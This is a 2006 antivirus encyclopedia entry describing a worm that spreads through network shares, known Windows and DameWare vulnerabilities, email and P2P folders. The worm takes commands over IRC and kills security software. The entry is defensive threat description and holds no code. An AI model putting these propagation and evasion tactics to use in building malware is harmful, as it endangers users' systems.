|
Saturday, 22 April 2006 |
Description:
To get a one-glance comprehensive view of the behavior of this worm,
Comments/Suggestions
We would like to know what you think about the Behavior Diagram, our latest Virus Encyclopedia feature. Please click here to send us your comments, suggestions, or feedback.
Malware Overview
Trend Micro has received numerous samples of this worm spreading in the wild.
It uses social engineering techniques in order to propagate though several methods.
Social engineering, a propagation technique that is widely utilized by most worm programs, invests largely on computer users instinctive tendency to open email messages, execute attachments that are enticing and apparently harmless, and download and unknowingly open attractively named files.
This worm may propagate by generating IP addresses and dropping a copy of itself in the said addresses specific default shares. It can also exploit the following vulnerabilities to propagate:
* Microsoft Security Bulletin MS03-007
* Microsoft Security Bulletin MS04-011
* DameWare Remote Control Server Stack Overflow Exploit vulnerability
In addition, it can spread by attaching a copy of itself to an email message, which it sends to target recipients. Users must take note of the email details to avoid infection.
Aside from the aforementioned propagation routines, this worm can also spread by dropping copies of itself to popular P2P applications shared folders.
These applications include eDonkey2000, iMesh, KAZAA, LimeWire, Morpheus, and WarezP2P.
The dropped copies of this worm are named either as legitimate applications or as a crack to popular software applications. Its copies can also appear to have adult content by using descriptive names of popular actresses. As a result, users in the network are more prone to opening these files. Once the target user copies and executes the said files, he or she is automatically infected by this worm.
This worm acts as a server program controlled by an Internet Relay Chat (IRC) bot. It opens a random port and connects to a certain IRC server before joining an IRC channel. Once connected, this server program receives commands from the IRC bot. The said commands are used to control the target system and the behavior of the server program. It executes these commands on the affected machine, thus further opening the said machine to other malicious attacks.
It terminates several processes that are related to antivirus and security applications. It does this routine to prevent early detection and removal from the affected machine.
|
